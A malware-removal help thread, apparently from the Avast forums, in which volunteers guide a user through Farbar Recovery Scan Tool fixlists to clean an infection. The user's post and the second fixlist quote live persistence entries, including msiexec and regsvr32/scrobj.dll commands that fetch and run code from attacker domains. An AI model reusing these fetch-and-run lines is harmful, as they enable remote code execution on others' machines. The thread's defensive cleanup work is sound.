Hi, since yesterday I have an issue similar to https://forum.avast.com/index.php?topic=200605.0.
I have attached one of last Avast notifications, mbam.txt (I removed all that it found and restarted the computer) and both FRST logs.
Please help.
Apparently removing stuff with Malwarebytes didn’t help, I just got another notification from Avast of the same type.
Well, i am with your same issue, so the best thing to do now i go to VirusTotal and put your regsvr32.exe to scan and see what happpens.
Personally I feel you should (bot) stick to your own topics and concentrate on that, it will progress more quickly all around.
I don’t see any benefit in trying to upload the regsvr32.exe to virustotal clean or infected won’t effect the removal process.
This file may possibly be clean but being used by a hidden or undetected piece of malware, we have seen this before in these types of URL:Mal before and invariably it requires a malware removal specialist to analyse the logs. These malware removal specialists are volunteers and may be in a different time zone to you, so there may be a delay.
Why a threat: http://urlquery.net/report.php?id=1491999094715
Nowly registrered sites always mean a risk.
Re: https://www.virustotal.com/pl/url/d5b9c347064317dc0fc36b25bdb353eec696e5efddd8dfe9b46a03b3b96a032f/analysis/1492033209/
Apparent abuse on CloudFlare: https://www.reasoncoresecurity.com/ip-address-104.28.24.130.aspx
Big Data Domain CDN is not always the most secure way to go: https://cymon.io/104.28.24.14
Once Malware reported by Quttera’s, now clean(sed): https://quttera.com/detailed_report/cinemaindo21.com
polonus
Please download Farbar Recovery Scan Tool 64bit and save it to your Desktop.
Open notepad by pressing the Windows Key + R Key, typing in Notepad in the Run dialog and then pressing Enter. Please copy the contents of the Code box below. To do this highlight the contents of the box and right click on it and select copy (or you can just click on the (select) next to Code Box). Paste this into the open notepad. Save it to your desktop as fixlist.txt
Start
CreateRestorePoint:
EmptyTemp:
CMD: bitsadmin /reset /allusers
End
NOTE. It’s important that both files, FRST64 and fixlist.txt are in the same location or the fix will not work.
NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system
Run FRST64 by right clicking on the FRST64.exe file, selecting “Run as Administrator…”. The User Account Control may open up; if it does, select Yes to continue to let FRST open and load.
The tool will check for an updated version of itself every time it loads; please allow it to do this and the program will either inform you it is downloading an updated copy (and to wait until it is safe to continue) or show nothing (meaning there is no update found) and you can continue on. Press the Fix button just once and wait. The tool will create a restore point, process the script and ask for a restart of your system.
If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
When finished FRST will generate a log on the Desktop (Fixlog.txt). Please attach it to your reply post. Also, tell me how your system is running now.
I did what you have suggested (the fixlog is attached), but it didn’t help much (got another notification from Avast)
I also found https://www.reverse.it/sample/7d76d5b481208886acdb03894200d29014a84caa35cefc2e6f946eb609c33d47?environmentId=100 and indeed there was a task in task cheduler called “PowerWord-SCT-JT” where the point.lotusiloveyou.com is called. I removed it manually.
I also have search FRST.txt for occurances of “point” and I have found:
HKU\S-1-5-21-1187086607-2241910082-2178557204-1002.…\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1WNdNWFTk2MWHxN8F4RjI4N8E2RURXMYQLFjYyMTE2FF== /q
I guess this also has to go? Maybe other stuff too?
Hmm, so no more help?
Remember what I said in Reply #4:
These malware removal specialists are volunteers and may be in a different time zone to you, so there may be a delay.
They may also other commitments.
Witam,
“Cierpliwość w pieczeniu nie jest cnotą: jest koniecznością”.
Some patience always is a good thing, the qualified remover will certainly come back to reply.
Hang in here and come back to see when there will be a reaction.
We owe these friendly g33k volunteers a lot and they are the best ambassadors of our forums.
pozdrawiam,
polonus
And don’t forget it is eastern.
Many people have family things to do.
Open notepad by pressing the Windows Key + R Key, typing in Notepad in the Run dialog and then pressing Enter. Please copy the contents of the Code box below. To do this highlight the contents of the box by clicking [Select] next to Code: , then right click on any of the highlighted text and select copy. Paste this into the open notepad. Save it to your desktop as fixlist.txt
NOTE. It’s important that both files, FRST64 and fixlist.txt are in the same location or the fix will not work.
NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system
Run FRST64 by right clicking on the FRST64.exe file, selecting “Run as Administrator…”. The User Account Control may open up; if it does, select Yes to continue to let FRST open and load.
The tool will check for an updated version of itself every time it loads; please allow it to do this and the program will either inform you it is downloading an updated copy (and to wait until it is safe to continue) or show nothing (meaning there is no update found) and you can continue on. Press the Fix button just once and wait. The tool will create a restore point, process the script and ask for a restart of your system.
If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
When finished FRST will generate a log on the Desktop (Fixlog.txt). Please attach it to your reply post. Also, tell me how your system is running now.
Open notepad by pressing the Windows Key + R Key, typing in Notepad in the Run dialog and then pressing Enter. Please copy the contents of the Code box below. To do this highlight the contents of the box by clicking [Select] next to Code: , then right click on any of the highlighted text and select copy. Paste this into the open notepad. Save it to your desktop as fixlist.txt
Start
CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-21-1187086607-2241910082-2178557204-1002\...\Run: [GoogleChromeAutoLaunch_0E88968AB6E333A1EE32FB0CAEC6C936] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [941912 2017-03-29] (Google Inc.)
HKU\S-1-5-21-1187086607-2241910082-2178557204-1002\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1WNdNWFTk2MWHxN8F4RjI4N8E2RURXMYQLFjYyMTE2FF== /q
FF Extension: (Youtube Unblocker Remediation) - C:\Users\Dorota\AppData\Roaming\Mozilla\Firefox\Profiles\soidrj3s.default-1489007957836\features\{e11a4af5-8171-4683-9947-9418cceafe31}\malware-remediation@mozilla.org.xpi [2017-03-19]
CHR StartupUrls: Default -> "hxxp://isearch.omiga-plus.com/?type=hppp&ts=1420478497&from=cor&uid=SamsungXSSDX840XEVOX250GB_S1DBNSBF491610H","hxxp://www.delta-homes.com/?type=hp&ts=1431685322&z=9bbe70a27c865bdf0e3ef4cgezecegaq5bfw3cao5q&from=wpm05153&uid=SamsungXSSDX840XEVOX250GB_S1DBNSBF491610H","hxxp://www.mystartsearch.com/?type=hp&ts=1445204015&z=201fe1dff78ab08f6eba7c5g1zfz8w7o9e4zde2g1w&from=cornl&uid=samsungxssdx840xevox250gb_s1dbnsbf491610h"
2017-03-24 15:15 - 2017-03-24 15:15 - 0883024 _____ (McAfee, Inc.) C:\Users\Dorota\AppData\Local\Temp\0257781490361313mcinst.exe
2016-02-15 23:13 - 2016-02-15 23:13 - 0144008 _____ (© 2015 Microsoft Corporation) C:\Users\Dorota\AppData\Local\Temp\BingSvc.exe
2016-02-15 23:13 - 2016-02-15 23:13 - 1118360 _____ (© 2015 Microsoft Corporation) C:\Users\Dorota\AppData\Local\Temp\BSvcProcessor.exe
2016-02-15 23:13 - 2016-02-15 23:13 - 0170128 _____ (© 2015 Microsoft Corporation) C:\Users\Dorota\AppData\Local\Temp\BSvcUpdater.exe
2015-12-04 07:41 - 2015-12-04 07:41 - 0000101 _____ () C:\Users\Dorota\AppData\Local\Temp\component.exe
2016-02-15 23:03 - 2016-02-15 23:03 - 2612880 _____ (Microsoft Corporation) C:\Users\Dorota\AppData\Local\Temp\DefaultPack.EXE
2015-12-04 07:41 - 2015-12-04 07:41 - 0000101 _____ () C:\Users\Dorota\AppData\Local\Temp\oursurfing.exe
2015-12-04 07:41 - 2015-12-04 07:41 - 0000101 _____ () C:\Users\Dorota\AppData\Local\Temp\pps-qq-19.exe
2017-03-15 19:29 - 2017-03-15 19:29 - 14456872 _____ (Microsoft Corporation) C:\Users\Dorota\AppData\Local\Temp\vc_redist.x86.exe
2015-11-12 19:48 - 2015-11-12 19:48 - 0144008 _____ (© 2015 Microsoft Corporation) C:\Users\Oem\AppData\Local\Temp\BingSvc.exe
2015-11-07 00:57 - 2015-11-12 19:48 - 1118360 _____ (© 2015 Microsoft Corporation) C:\Users\Oem\AppData\Local\Temp\BSvcProcessor.exe
2015-11-07 00:57 - 2015-11-12 19:48 - 0170128 _____ (© 2015 Microsoft Corporation) C:\Users\Oem\AppData\Local\Temp\BSvcUpdater.exe
2009-07-13 21:12 - 2009-07-13 21:12 - 1047632 _____ (Microsoft Corporation) C:\Users\Oem\AppData\Local\Temp\DPInstx64.exe
2009-07-13 20:47 - 2009-07-13 20:47 - 0922176 _____ (Microsoft Corporation) C:\Users\Oem\AppData\Local\Temp\DPInstx86.exe
2010-10-08 10:07 - 2010-10-08 10:07 - 0075672 _____ () C:\Users\Oem\AppData\Local\Temp\DPInst_Monx64.exe
2010-10-08 10:07 - 2010-10-08 10:07 - 0075160 _____ () C:\Users\Oem\AppData\Local\Temp\DPInst_Monx86.exe
2015-11-01 02:19 - 2009-07-09 18:11 - 0771408 ____N (CANON INC.) C:\Users\Oem\AppData\Local\Temp\MSETUP4.EXE
2015-10-29 11:03 - 2015-10-03 04:18 - 0835592 _____ (NVIDIA Corporation) C:\Users\Oem\AppData\Local\Temp\nvSCPAPI64.dll
2015-11-01 00:07 - 2015-10-03 04:18 - 0316024 _____ (NVIDIA Corporation) C:\Users\Oem\AppData\Local\Temp\nvStInst.exe
2010-10-08 10:06 - 2010-10-08 10:06 - 0075152 _____ () C:\Users\Oem\AppData\Local\Temp\OS_Detect.exe
Task: {3CFFF7B2-B3EC-4BD5-BBDA-857B4FFEFD6D} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkMj1WNdNWFTk2MWHxN8F4RjI4N8E2RURXMYQLFjYyMTE2FF== scrobj.dll
AlternateDataStreams: C:\Users\Dorota\AppData\Local\KUQS3XP9:LPEBkOcS8bEmJXAICfu6K7eqFka [2214]
AlternateDataStreams: C:\Users\Dorota\AppData\Local\Temp:YzCGtdStv7PZX7ynWe94qy0 [1900]
AlternateDataStreams: C:\Users\Dorota\AppData\Local\wy3DmvEdduas:3JshCQEwkq4kocCM7 [1934]
cmd: ipconfig /flushdns
cmd: netsh advfirewall reset
cmd: netsh advfirewall set allprofiles state on
Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
CMD: bitsadmin /reset /allusers
RemoveProxy:
EmptyTemp:
Reboot:
end
NOTE. It’s important that both files, FRST64 and fixlist.txt are in the same location or the fix will not work.
NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system
Run FRST64 by right clicking on the FRST64.exe file, selecting “Run as Administrator…”. The User Account Control may open up; if it does, select Yes to continue to let FRST open and load.
The tool will check for an updated version of itself every time it loads; please allow it to do this and the program will either inform you it is downloading an updated copy (and to wait until it is safe to continue) or show nothing (meaning there is no update found) and you can continue on. Press the Fix button just once and wait. The tool will create a restore point, process the script and ask for a restart of your system.
If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
When finished FRST will generate a log on the Desktop (Fixlog.txt). Please attach it to your reply post. Also, tell me how your system is running now.